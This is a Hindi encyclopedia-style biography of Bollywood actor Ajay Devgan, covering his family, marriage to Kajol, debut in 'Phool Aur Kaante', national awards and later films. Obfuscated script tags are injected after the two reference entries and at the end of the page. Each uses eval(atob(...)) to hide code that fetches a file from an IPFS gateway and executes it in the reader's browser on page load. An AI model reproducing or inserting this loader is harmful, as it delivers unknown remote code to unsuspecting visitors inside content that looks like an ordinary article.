अजय देवगन

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

अजय देवगन (अंग्रेज़ी: Ajay Devgan, जन्म- 2 अप्रॅल, 1969, नई दिल्ली, भारत) भारतीय बॉलीवुड फिल्‍मों के मशहूर अभिनेता, निर्देशक और निर्माता हैं। वे हिन्‍दी सिनेमा के बेहतरीन अभिनेताओं में से एक माने जाते हैं। अजय देवगन को बेहतरीन अभिनय करने के लिए अपने कॅरियर में दो बार राष्‍ट्रीय पुरुस्कार से नवाजा गया है। उन्हें 'फिल्मफेयर अवार्ड्स', 'नेशनल फिल्म अवार्ड फॉर बेस्ट एक्टर' और इसके अतिरिक्त भारत सरकार की तरफ़ से साल 2016 में 'पद्मश्री' से भी सम्मानित किया जा चुका है। वे ऐसे संजीदा अभिनेता हैं, जो अपनी आँखों से सारा अभिनय कर देते हैं। वे बॉलीवुड के उन अभिनेताओं में से एक हैं, जिनके पास यातायात के लिए अपना निजी जेट है। अपनी अदाकारी से सब के दिल जीतने वाले अजय देवगन गंभीर अभिनय करने के लिए जाने जाते हैं। उनकी एक और खास बात यह है कि जब उनकी फिल्म रिलीज़ होती है तो ही शो में आते हैं, अन्यथा ग्लैमर की दुनिया से दूर बस अपने काम में मशगूल रहते हैं।

परिचय

अजय देवगन का जन्म 2 अप्रॅल, 1969 को दिल्ली में एक पंजाबी परिवार में हुआ था। वह मूल रूप से पंजाब के अमृतसर से आते हैं। अजय देवगन का जन्म का नाम विशाल देवगन है। उनके पिता वीरू देवगन हिन्दी फिल्मों के स्टंटमैन और एक्शन फिल्म डायरेक्टर भी थे। अजय की मां वीणा देवगन ने कुछ फिल्मों का निर्माण किया था। उनका एक भाई भी है, जिसका नाम अनिल देवगन है। अजय ने स्नातक की पढ़ाई मुंबई के मिट्ठी भाई कॉलेज से पूरी की थी।[1]

विवाह

अजय देवगन ने हिन्दी सिनेमा की ही सुप्रसिद्ध अभिनेत्री काजोल से विवाह किया। काजोल अपने समय की प्रसिद्ध अभिनेत्री तनूजा की पुत्री हैं। 1995 में अजय देवगन और काजोल फिल्म 'गुंडाराज' के बाद से आपसी रिश्ते में दिखाई दिए। उस समय मीडिया उन्हें 'एन अनलाइकली पेयर' कहता था, क्योंकि उन दोनों के रंग में काफ़ी फर्क था। 24 फरवरी, 1999 को वे दोनों पारंपरिक महाराष्ट्रियन रीति-रिवाजों से अजय देवगन के ही घर में विवाह बंधन में बंध गये।[2] अजय देवगन एक पुत्री तथा एक पुत्र के पिता हैं। पुत्री का नाम 'न्यासा' और पुत्र का नाम 'युग' है।

फ़िल्मी शुरुआत

अजय देवगन के पिता वीरू देवगन और माँ वीणा देवगन फ़िल्मों से जुड़े थे, इसीलिए अजय की रुचि भी फिल्मों की ओर गई और वे फिल्म निर्देशक बनने का सपना देखने लगे। अपनी स्नातक की पढ़ाई पूरी करने के बाद वे फिल्म निर्देशक शेखर कपूर के साथ सहायक निर्देशक के रूप में काम करने लगे। इसी दौरान उनकी मुलाकात कुक्कु कोहली से हुई जो उन दिनों नई फिल्म 'फूल और कांटे' के निर्माण में व्यस्त थे और एक ऐसे अभिनेता की तलाश में थे जो रूमानी भूमिका के साथ-साथ एक्शन दृश्य भी कर सके। इस दौरान उन्होंने अजय देवगन के बारे में सुना कि वे एक्शन और नृत्य करने में माहिर हैं। कुक्कु कोहली ने उनसे फिल्म का नायक बनने की पेशकश की। अपनी पहली ही फिल्म 'फूल और काँटे' की सफलता के बाद अजय देवगन दर्शकों के बीच अपनी पहचान बनाने में कामयाब हो गए। इसके बाद अजय ने पीछे मुड़कर नहीं देखा और कामयाबी की सीढ़ियां चढ़ते गए।

सफलताएँ

अजय देवगन की फिल्‍म ‘फूल और कांटे’ उस समय की सबसे चर्चित सुपरहिट फिल्म थी। इस फिल्‍म में दो मोटर साइकिल पर पैर रखकर उनके द्वारा की गई एंट्री आज तक चर्चा का विषय बनी रहती है। इस फिल्म के ज़रिए अजय देवगन ने बॉलीवुड में धमाकेदार एंट्री मारी। 'फूल और काँटे' के बाद आई उनकी फिल्‍म ‘जिगर’ भी हिट रही थी। इसके बाद उनकी कई फिल्‍में आईं, जिन्‍होंने बॉक्‍स ऑफिस पर अच्‍छा व्‍यवसाय किया। फिल्‍म ‘हम दिल दे चुके सनम’ उनके कॅरियर का टर्निंग प्‍वाइंट रही, जिसके लिए उन्‍हें कॉफी प्रशंसा मिली। वर्ष 1999 में उन्हें महेश भट्ट निर्देशित फिल्म ‘जख्म’ और 2002 में राजकुमार संतोषी निर्देशित फिल्म 'द लेजेंड ऑफ़ भगत सिंह' के लिये सर्वश्रेष्ठ अभिनेता का राष्ट्रीय फ़िल्म पुरस्कार प्राप्त हो चुका है। 2011 में आई उनकी फ़िल्म 'सिंघम' में वे एक्सन हीरो के रूप में छा गये। ये फिल्म सुपरहिट रही थी और इसने कारोबार भी अच्छा किया था। फिर 'सिंघम' का अगला पार्ट 'सिंघम रिटर्न' 2014 में आया। हालाँकि ये कहना ग़लत होगा कि अजय देवगन सिर्फ़ एक्सन हीरो हैं। वे लगभग हर शैली की फ़िल्मों मे परफ़ेक्ट अभिनय करते हैं। उनके अभिनय का अंदाज ही जुदा है। उन्होंने लगभग हर शैली की फ़िल्में की हैं, चाहे एक्सन हो या रोमांटिक या कॉमेडी; सभी में अजय देवगन फिट बैठते हैं। उन्होंने लगभग सभी तरह की फ़िल्में हिट की हैं। अजय देवगन ने 100 से ज़्यादा फ़िल्मों में काम किया है, जिसमें उन्होंने कई यादगार फ़िल्में दी हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. अजय देवगन की जीवनी (हिंदी) achhigyan.com। अभिगमन तिथि: 15 दिसम्बर, 2016।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. लोकप्रिय अभिनेता अजय देवगन की कहानी (हिंदी) gyanipandit.com। अभिगमन तिथि: 15 दिसम्बर, 2016।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>